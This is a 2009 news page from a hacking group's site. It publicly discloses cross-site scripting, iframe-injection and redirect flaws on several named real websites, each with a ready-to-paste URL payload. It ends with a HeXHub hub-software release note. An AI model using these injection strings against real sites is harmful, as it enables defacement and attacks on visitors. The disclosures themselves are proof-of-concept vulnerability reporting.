Nemesis Our Projects Forums Extra Controls
  RegMe

News


Bloombase - XSS & IFrame Injection

Vulnerable page is: http://www.bloombase.com/download/search.jsp

PoC:

XSS -
Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


http://img12.imageshack.us/img12/4602/33995996.jpg

IFrame Injection -
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img27.imageshack.us/img27/7669/85332927.jpg

Submitted on 2009-09-01 by [-TE-]-Neo (0 comments)

ArcaBit - XSS

PoC:

XSS -
Code:
http://www.arcabit.pl/content/view/531/123/lang,english/%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E


http://img6.imageshack.us/img6/2445/12367325.jpg

IFrame Injection -
Code:
http://arcabit.pl/faq/search/?q=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fnemesis.te-home.net%3E%3C%2Fiframe%3E&s=OK


http://img8.imageshack.us/img8/3421/45031884.jpg

The administration has of course been notified about the problem.

Submitted on 2009-08-11 by [-TE-]-Neo (0 comments)

Panda Security Poland - XSS & IFrame Injection

PoC:

XSS -
Code:
http://www.pspolska.pl/onas/prasa/article.php?id=604&rok=2009%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E


http://img354.imageshack.us/img354/7860/83377031.jpg

IFrame Injection -
Code:
http://www.pspolska.pl/onas/prasa/article.php?id=604&rok=2009%22%3E%3Ciframe%20src=http://nemesis.te-home.net%3E%3C/iframe%3E


http://img190.imageshack.us/img190/3170/72988111.jpg

Submitted on 2009-07-31 by [-TE-]-Neo (0 comments)

Hacker-safe vs Trust-Guard vs Truste

Hacker-safe vs Trust-Guard vs Truste
  
Multiple HTML Injection Vulnerability

hackersafe.com.tr

vulnerable page:

Code:
http://www.hackersafe.com.tr/merchants/moreinfo.htm
  
Code:
http://hackersafe.com.tr/mail.php

Code:
http://hackersafe.com.tr/mail2.php


http://img145.imageshack.us/img145/1280/89767110.jpg


Trust-Guard - XSS,Redirect and Iframe injecxtion

Code:
http://blog.trust-guard.com/?s="><script>alert(String.fromCharCode(88,83,83))</script>

Code:
http://blog.trust-guard.com/?s=">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""



http://img407.imageshack.us/img407/1584/36759027.jpg
http://img407.imageshack.us/img407/9493/22598724.jpg

Code:
https://secure.trust-guard.com/ResetPassword.php
  

The same bug on login module !

http://img29.imageshack.us/img29/3552/61673649.gif

http://img29.imageshack.us/img29/7527/50370154.gif


Truste.org - XSS & Iframe injection

Code:
http://blog.truste.org/index.php?s="><script>alert(String.fromCharCode(88,83,83))</script>


Code:
http://blog.truste.org/index.php?s="><iframe src=http://nemesis.te-home.net></iframe>


Vulnerable page on truste.org

Code:
http://www.truste.org/forms/learn_more.php


http://img366.imageshack.us/img366/8851/90848824.gif

http://img366.imageshack.us/img366/4775/15714262.gif  

How someone can sell Security Certificate when his security are 0 ?

Submitted on 2009-06-22 by [-TE-]-Methodman (0 comments)

HeXHub 5.04

New release of HeXHub - version 5.04.

Changes:
  • corrected: error while allocating cache buffers (thanks to Takel for reporting this error)
  • corrected: if securepass was enabled, it was always required when registering on website
  • added: new setting to re-scan plugins: !set ext rescan (requested by Maximum)
  • added: support for Keep-Alive connections
  • added: new parameter "post" that is used to prevent IE from reposting form data
  • the !seen command can be forced to search for a nick in case the nick starts with a number if a "." is appended to it - !seen. nick (requested by RoLex)
  • the right adm6 is needed to see copyright information for installed plugins with !about


Also, TEext was updated to version 7.02b. This version can crash DDoS bots when they attempt to send CTM's with wrong IP. Some DDoS bots join more than one hub, and most of them attempt to exploit any hubsoft with any version. When TEext detects an exploitation attempt, it will flood the bot with new nicks to fill its nicklist (all bots add fake nicks to their own nicklist). It is enough for one hub to crash a bot to get it out of all hubs it is in. For this, you need to enable crashing clients of spammers in TEext and to change the following restrictions for $ConnectToMe:
Code:
!set cmd connecttome keeplast off
!set cmd connecttome fromone 40 / m
!set cmd connecttome notifyip on


Submitted on 2009-06-11 by Vektor (0 comments)



Older